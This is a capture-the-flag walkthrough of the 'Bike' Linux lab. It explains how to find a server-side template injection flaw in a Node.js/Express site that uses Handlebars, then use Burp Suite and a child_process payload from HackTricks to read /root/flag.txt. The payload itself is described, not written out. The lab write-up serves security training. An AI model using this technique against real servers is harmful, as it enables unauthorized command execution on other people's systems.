Bike - Linux

Ping and Nmap the target Ip using nmap -sC -sV -v {target Ip}, where -v causes Nmap to print more information about the scan in progress.

We see 2 ports open, port 22/tcp running ssh, and port 80/tcp open running http which we’ll be looking more into. Next, we’ll search the target Ip in a browser.

We are brought to an unfinished website with an option to enter an email address, Wappalyzer confirms it is using Node.js along with Nmap. Node.js an open-source, cross-platform, back-end JavaScript runtime environment that can be used to build scalable network applications. Wappalyzer also shows the web frameworks uses Express which is also confirmed by Nmap. Express is a minimal and flexible Node.js web application framework that provides a robust set of features for web and mobile applications.

After entering an email address, it reflects the input which could help us find vulnerability, in this lab we use a Server-Side Template Injection (SSTI) vulnerability. Template Engines are used to display dynamically generated content on a web page. Server-side template injection is a vulnerability where the attacker injects malicious input into a template to execute commands on the server. After a quick search on SSTI vulnerabilities we are led to an article on Hacktricks which will be referenced later in the lab. https://book.hacktricks.wiki/en/pentesting-web/ssti-server-side-template-injection/index.html.

The Detection paragraph in the article shows us a variety of special characters commonly used in template expressions like ${7*7}, {{7*7}}, etc. which can help us find an SSTI vulnerability. In this case if we enter {{7*7}} into the email field, we get an error message that shows us the web page is using the “handlebars” template is running on the /root/Backend/ directory.

Using BurpSuite we can capture the request and edit it. BurpSuite enables users to intercept, inspect, modify, and replay HTTP/HTTPS traffic between a web browser and a web server, allowing for the identification of security vulnerabilities.

After entering the Proxy menu we open the browser and search the target Ip, next type {{7*7}} into the email field and turn intercept on in BurpSuite, then submit the package and send the Request to the Repeater menu.

In the Repeater menu we can edit the request to send anything we want, with some lines of code gotten from HackTricks, we next need to call require and load a module. We can load the child_process module as it is available on default Node.js installations and can be used to execute system commands. We get this code From HackTricks and need to enter the Decoder menu, and encode it as URL

We can next copy the encoded string and place it into the email field in the repeater tab and click send in the top left to send the request. After selecting render in the Response section, we can see that the request was received under the email field on the web page.

Since we can now enter commands using child_process, we can copy and paste more code from HackTricks into the Decoder menu to ls the /root directory and encode it as URL. This shows us the flag.txt on the Repeater menu after entering the URL string into the email field.

Finally, we can go back and edit that same code to use the command cat /root/flag.txt and again encode it to URL. After pasting the URL string into the email field and sending the request, we can read the file and capture the flag from the Response section.